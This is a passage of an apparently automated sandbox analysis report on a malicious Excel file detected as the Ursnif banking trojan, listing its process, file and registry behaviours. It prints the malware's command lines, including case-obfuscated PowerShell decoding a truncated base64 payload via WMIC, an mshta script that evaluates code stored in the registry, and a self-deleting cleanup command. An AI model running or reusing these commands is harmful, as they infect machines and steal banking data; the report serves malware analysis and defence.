Source: C:\Windows\System32\cmd.exe	Console Write: ....................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d...........&.X.+.....V.#J..............&.....#..w..&.&...`.....,.....

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Windows\System32\wbem\WMIC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\PING.EXE	File read: C:\Windows\System32\drivers\etc\hosts

Runs a DLL by calling functions

Show sources

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user~1\AppData\Local\Temp\W. DllRegisterServer

Sample is known by Antivirus

Show sources

Source: MIL0001742828.xls

Virustotal: Detection: 16%

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe wMic 'pRocess' Call 'creaTE' 'poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9y
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9y4G5SttooUhAe
Source: unknown	Process created: C:\Windows\System32\PING.EXE 'C:\Windows\system32\PING.EXE' update.microsoft.com
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user~1\AppData\Local\Temp\W. DllRegisterServer
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2596 CREDAT:275457 /prefetch:2
Source: unknown	Process created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3092 CREDAT:275457 /prefetch:2
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2812 CREDAT:275457 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>moveTo(-898,-989);resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\DCB842AC-8BFE-6E42-F5D0-EF82F90493D6\\DtshsPub'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Invoke-Expression ([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:Software\AppDataLow\Software\Microsoft\DCB842AC-8BFE-6E42-F5D0-EF82F90493D6').crypmgmt))
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ygdsonvv.cmdline'
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3684 CREDAT:275457 /prefetch:2
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES74FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC7436.tmp'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0kgxdqm.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES9007.tmp' 'c:\Users\user\AppData\Local\Temp\CSC9006.tmp'
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\AppData\Local\Temp\W'
Source: unknown	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\wbem\WMIC.exe wMic 'pRocess' Call 'creaTE' 'poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9y	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE 'C:\Windows\system32\PING.EXE' update.microsoft.com	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user~1\AppData\Local\Temp\W. DllRegisterServer	Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2596 CREDAT:275457 /prefetch:2	Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new	Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3092 CREDAT:275457 /prefetch:2	Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2812 CREDAT:275457 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Invoke-Expression ([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:Software\AppDataLow\Software\Microsoft\DCB842AC-8BFE-6E42-F5D0-EF82F90493D6').crypmgmt))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ygdsonvv.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0kgxdqm.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES74FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC7436.tmp'
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3684 CREDAT:275457 /prefetch:2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES9007.tmp' 'c:\Users\user\AppData\Local\Temp\CSC9006.tmp'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\AppData\Local\Temp\W'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Reads internet explorer settings

Show sources

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: c:\Users\user\AppData\Local\Temp\ygdsonvv.pdb source: csc.exe, 00000017.00000002.2585762402.00212000.00000004.00000001.sdmp, ygdsonvv.dll.23.dr
Source:	Binary string: c:\Users\user\AppData\Local\Temp\v0kgxdqm.pdb source: csc.exe, 0000001C.00000003.2590267695.002CF000.00000004.00000001.sdmp, v0kgxdqm.dll.28.dr
Source:	Binary string: mc:\Users\user\AppData\Local\Temp\ygdsonvv.pdb source: csc.exe, 00000017.00000002.2586272989.014CD000.00000004.00000001.sdmp
Source:	Binary string: mc:\Users\user\AppData\Local\Temp\v0kgxdqm.pdb source: csc.exe, 0000001C.00000002.2595149226.0132D000.00000004.00000001.sdmp
Source:	Binary string: c:\Read\Fruit\pay\Hold\child\Drive\Root\LikeSouth.pdb source: W.4.dr
Source:	Binary string: Display this usage messageSSpecify debug information file name (default: output file name with .pdb extension)5### Visual C# 2005 Compiler Defect Report, created %s source: csc.exe, 00000017.00000002.2586001258.00300000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.2595029262.00320000.00000002.00000001.sdmp

Data Obfuscation:

PowerShell case anomaly found

Show sources

Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe wMic 'pRocess' Call 'creaTE' 'poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9y
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9y4G5SttooUhAe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\wbem\WMIC.exe wMic 'pRocess' Call 'creaTE' 'poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9y	Jump to behavior

Suspicious powershell command line found

Show sources

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9y4G5SttooUhAe

Compiles C# or VB.Net code

Show sources

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ygdsonvv.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0kgxdqm.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ygdsonvv.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0kgxdqm.cmdline'

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_0045A17F push ecx; ret		8_2_0045A18F
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_00459DB0 push ecx; ret		8_2_00459DB9

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Drops PE files

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	File created: C:\Users\user\AppData\Local\Temp\ygdsonvv.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	File created: C:\Users\user\AppData\Local\Temp\v0kgxdqm.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\W	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\W

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000E.00000002.2640661969.029B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2525298573.0259C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2517600435.02798000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2248, type: MEMORY

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
